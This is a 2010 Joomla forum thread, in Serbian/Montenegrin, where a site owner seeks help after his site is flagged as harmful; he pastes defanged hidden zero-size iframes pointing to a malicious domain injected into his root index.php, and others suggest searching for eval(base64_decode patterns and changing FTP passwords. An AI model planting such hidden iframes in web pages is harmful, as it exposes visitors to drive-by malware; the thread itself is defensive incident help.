Ova stranica može uništiti vaš računar

Moderators: cicans, TheHacker

Locked
milutin
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 113
Joined: Mon Sep 17, 2007 2:19 pm
Contact:

Ova stranica može uništiti vaš računar

Post by milutin » Tue Jun 08, 2010 12:33 pm

Prije nekoliko dana vidim da mi je na pocetnoj strani nestalo izvor acloanaka sa vijestima, pogledam bazu podataka i vidim da ne postoje kategorije - to jest tabela u bazi postoji ali je prazna, uradim povrat iz mog bekapa, i sve radi normalno. Ali nelezi vraze odmah sutradan na Googlovoj pretrazi stoji :Ova stranica može uništiti vaš računar..

Pogledam u browseru izvoru koda stranice na dnu svake strane stoji:

Code: Select all

<iframe src="http://zuo.podgorz.....org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo.podgorz......org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo.....podgorz......org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe....> ?><iframe src="http://zuo.....podgorz.....org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo.....podgorz......org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe.....> ?><iframe src="http://zuo......podgorz......org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe..> ?><iframe src="http://zuo......podgorz.......org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe></iframe...>
Dodao sam tacke da ne bi vodio ka sajtu!

Ali nikako ne mogu da pronadjem odakle taj iframe dolazi? i kako je se pobogu ubacio.
Pregledao sam Vulnerable_Extensions_List i nijedna moja extenzija se ne nalazi tamo!

Pomoc: u piatnju je joomla 1.5.18
Last edited by milutin on Wed Jun 09, 2010 2:10 pm, edited 1 time in total.

User avatar
Vrlo Jak Tim
Joomla! Hero
Joomla! Hero
Posts: 2319
Joined: Mon Nov 07, 2005 12:58 am
Location: Bar, Crna Gora

Re: Ova stranica može uništiti vaš računar

Post by Vrlo Jak Tim » Tue Jun 08, 2010 12:40 pm

Samo bez panike.
Pogledaj bilo koji .php fajl prezentacije, vidi da li u njima ima nešto kao:

Code: Select all

 eval(base64_decode(...
Dragan Djordjevic
Member of Joomla! Montenegrin Translation Team
http://www.joomlamontenegro.com

milutin
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 113
Joined: Mon Sep 17, 2007 2:19 pm
Contact:

Re: Ova stranica može uništiti vaš računar

Post by milutin » Tue Jun 08, 2010 1:30 pm

Imao sam jedan takav fajl koji sam sad zamijeno (to je bio neki moj fajl kodiran!) imas li ideju gdje da jos pogledam?

User avatar
Vrlo Jak Tim
Joomla! Hero
Joomla! Hero
Posts: 2319
Joined: Mon Nov 07, 2005 12:58 am
Location: Bar, Crna Gora

Re: Ova stranica može uništiti vaš računar

Post by Vrlo Jak Tim » Tue Jun 08, 2010 3:56 pm

Skini cijelu prezentaciju na svoj računar, pa onda pregledaj SVAKI php fajl.
Prije toga... dobro prije toga... pretresi dobro svoj računar, i vidi da u njemu nemaš neku napast, nekim antivirusom. Takođe, pogledaj da li imaš fajl gifimg.php - njega takođe makni sa prezentacije.
Promijeni FTP passworde. Nemoj da koristiš Total Commander za FTP.
Dragan Djordjevic
Member of Joomla! Montenegrin Translation Team
http://www.joomlamontenegro.com

milutin
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 113
Joined: Mon Sep 17, 2007 2:19 pm
Contact:

Re: Ova stranica može uništiti vaš računar

Post by milutin » Wed Jun 09, 2010 2:09 pm

Evo pronasao sam u root index.php sledece na dnu strane

Code: Select all

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));
 ?><iframe src="http://zuo.....podgorz.....org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo....podgorz.....org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo......podgorz......org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo......podgorz.....org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo......podgorz.org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo......podgorz.org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe> ?><iframe src="http://zuo.......podgorz.....org/zuo/elen/index.php" width="0" height="0" frameborder="0"></iframe>
Nije mi uopste jasno kako su uspjeli da dodju do root index fajla?

User avatar
Vrlo Jak Tim
Joomla! Hero
Joomla! Hero
Posts: 2319
Joined: Mon Nov 07, 2005 12:58 am
Location: Bar, Crna Gora

Re: Ova stranica može uništiti vaš računar

Post by Vrlo Jak Tim » Wed Jun 09, 2010 3:46 pm

Prije toga... dobro prije toga... pretresi dobro svoj računar, i vidi da u njemu nemaš neku napast, nekim antivirusom. Promijeni FTP passworde. Nemoj da koristiš Total Commander za FTP.
Dragan Djordjevic
Member of Joomla! Montenegrin Translation Team
http://www.joomlamontenegro.com

milutin
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 113
Joined: Mon Sep 17, 2007 2:19 pm
Contact:

Re: Ova stranica može uništiti vaš računar

Post by milutin » Wed Jun 09, 2010 8:06 pm

Pretresao sam moj racunar i nema nista, cak i index.php u root moga localhosta nije zarazen i nema iframe. Za editovanje koristim dreamweaver i koristim njegov ftp vec 2 godine.

Sumanjam da je to nekako injektovano, ali kako neznam?

User avatar
gmagdic
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 118
Joined: Wed May 05, 2010 1:53 pm
Location: http://adriahost.rs

Re: Ova stranica može uništiti vaš računar

Post by gmagdic » Sat Jun 19, 2010 12:36 pm

Dodat je iframe na dno verovatno svake stranice, u 99% slucajeva bude do zombi-masine, tj. tvog kompa, koji pokupi sta mu treba i postavlja. Definitivno da je inject-ovano, a sad nije bitno kako, postoji dosta načina, bitno je da to rešiš.

Problem sa kojim ćeš se možda susresti je da na nekim stranicama nije nalepljen iframe na dno, već je prelomljena stranica i to dodat iframe, a ceo tvoj kod posle toga ne postoji. Idealno rešenje je vraćanje sajta iz backup-a, ako tvoj host pravi dnevni ili sedmični backup.

Tek kad si siguran da je tvoj komp cist, onda promeni FTP pass i cpanel pass.
Hosting podrška @ AdriaHost.
http://adriahost.rs

milutin
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 113
Joined: Mon Sep 17, 2007 2:19 pm
Contact:

Re: Ova stranica može uništiti vaš računar

Post by milutin » Sun Jun 20, 2010 10:39 am

Nasao sam ubaceni iframe na dno stranice u jednom od index.php nakon html taga - jos nisam utvrdio acno kako je doslo do toga ali sam promijenio pristupne sifre ftp-u i dodao dodatnu sigurnost joomla administraciji.
Da uvjek je dobro imati beckup, ja ga radim dvaputa mjesecno!

User avatar
gmagdic
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 118
Joined: Wed May 05, 2010 1:53 pm
Location: http://adriahost.rs

Re: Ova stranica može uništiti vaš računar

Post by gmagdic » Wed Jun 23, 2010 2:48 pm

Verovatno i tvoj hosting provajder radi jednom nedeljno ili možda dnevno, pa možeš i njih da cimneš da vrate sajt iz backup-a, ako nešto krene naopako.

Moj je predlog bio da zadnju stvar koju uradish bude promena FTP parametara. Jer ako nisi ocistio komp, a promenio si FTP parametre, pojesce ih ponovo, pa ces morati ponovo da ih menjas.
Hosting podrška @ AdriaHost.
http://adriahost.rs

User avatar
VM Srbija
Joomla! Guru
Joomla! Guru
Posts: 721
Joined: Fri Mar 27, 2009 6:18 pm

Re: Ova stranica može uništiti vaš računar

Post by VM Srbija » Thu Jun 24, 2010 3:53 pm

Imam pitanje. Ako je neko vec ufurao u php fajlove base64_decode, da li moze preko .htaccess fajla da se blokira izvrsavanje tih skripti kao sto je blokirano encodiranje?
It is all in my mind!!!


Locked

Return to “Bezbednost”